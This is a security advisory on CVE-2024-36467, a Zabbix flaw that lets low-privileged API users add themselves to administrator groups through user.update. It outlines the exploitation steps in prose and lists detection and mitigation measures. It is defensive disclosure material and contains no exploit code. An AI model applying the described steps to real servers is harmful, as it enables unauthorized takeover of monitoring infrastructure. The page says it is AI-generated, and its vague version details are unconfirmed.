CVE-2024-36467 Overview
CVE-2024-36467 is a privilege escalation vulnerability in Zabbix that allows authenticated users with basic API access to add themselves to any user group, including highly privileged groups such as Zabbix Administrators. The vulnerability exists in the user.update API endpoint, which fails to properly validate authorization when users modify their own group memberships. This improper authorization check (CWE-285) enables low-privileged users to escalate their privileges to administrator level, gaining complete control over the Zabbix monitoring infrastructure.
Critical Impact
Authenticated users with minimal API access can escalate to Zabbix Administrator privileges, potentially compromising the entire monitoring infrastructure and any systems it manages.
Affected Products
- Zabbix (multiple versions affected)
- Systems using Zabbix API with authenticated user access
- Zabbix installations with default User role configurations
Discovery Timeline
- 2024-11-27 - CVE-2024-36467 published to NVD
- 2025-10-08 - Last updated in NVD database
Technical Details for CVE-2024-36467
Vulnerability Analysis
This vulnerability stems from improper authorization controls in the Zabbix user.update API endpoint. The flaw allows authenticated users—even those with only the default User role—to modify their own group memberships without proper privilege verification. The attack can be executed remotely over the network with low complexity, requiring only low-privilege authentication and no user interaction.
The vulnerability grants attackers potential access to confidential monitoring data, the ability to modify critical monitoring configurations, and could impact the availability of the monitoring infrastructure. The only groups protected from this attack are those that are explicitly disabled or have restricted GUI access configured.
Root Cause
The root cause is classified as CWE-285 (Improper Authorization). The Zabbix API fails to properly validate whether a user has sufficient privileges to modify group memberships. When processing requests to the user.update endpoint, the system does not verify that the requesting user has authorization to add themselves to privileged groups, effectively bypassing the intended access control model.
Attack Vector
The attack is network-based and requires only authenticated API access. An attacker with a standard Zabbix user account can craft API requests to the user.update endpoint, specifying privileged groups such as "Zabbix Administrators" in the group membership parameters. The server processes this request without proper authorization checks, resulting in the user being added to the specified group.
The exploitation flow involves:
- Authenticating to the Zabbix API with a low-privileged user account
- Identifying target group IDs for privileged groups (e.g., Zabbix Administrators)
- Sending a user.update API request that modifies the attacker's own group memberships
- Gaining elevated privileges associated with the target group
For technical details on the exploitation mechanism, refer to the Zabbix Issue Tracker Entry.
Detection Methods for CVE-2024-36467
Indicators of Compromise
- Unexpected changes to user group memberships in Zabbix audit logs
- API calls to user.update endpoint from low-privileged user accounts that modify group assignments
- Users appearing in privileged groups (e.g., Zabbix Administrators) without authorized administrative action
- Anomalous API activity patterns from accounts that typically have limited access
Detection Strategies
- Monitor Zabbix audit logs for user.update API calls that modify group memberships
- Implement alerting for any non-administrative user attempting to modify group associations
- Review and audit user group memberships regularly for unauthorized changes
- Deploy API request logging to capture and analyze all user.update endpoint calls
Monitoring Recommendations
- Enable comprehensive audit logging for all Zabbix API endpoints
- Configure SIEM integration to detect privilege escalation patterns in Zabbix logs
- Establish baseline behavior for API usage by user role to identify anomalies
- Implement real-time alerting for changes to sensitive user groups
How to Mitigate CVE-2024-36467
Immediate Actions Required
- Review all user group memberships for unauthorized privilege escalations
- Audit API access permissions and restrict user.update endpoint access where possible
- Implement network segmentation to limit API access to trusted networks only
- Review Zabbix audit logs for evidence of exploitation
Patch Information
Zabbix has addressed this vulnerability in updated versions. Organizations should consult the Zabbix Issue Tracker Entry for specific version information and patch availability. Apply the latest security updates to all affected Zabbix installations as soon as possible.
Workarounds
- Restrict API access to only users who absolutely require it
- Implement network-level access controls to limit API endpoint exposure
- Configure disabled status or restricted GUI access for sensitive administrative groups as a partial mitigation
- Deploy Web Application Firewall (WAF) rules to monitor and filter suspicious user.update API requests
- Consider implementing additional authentication factors for API access
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
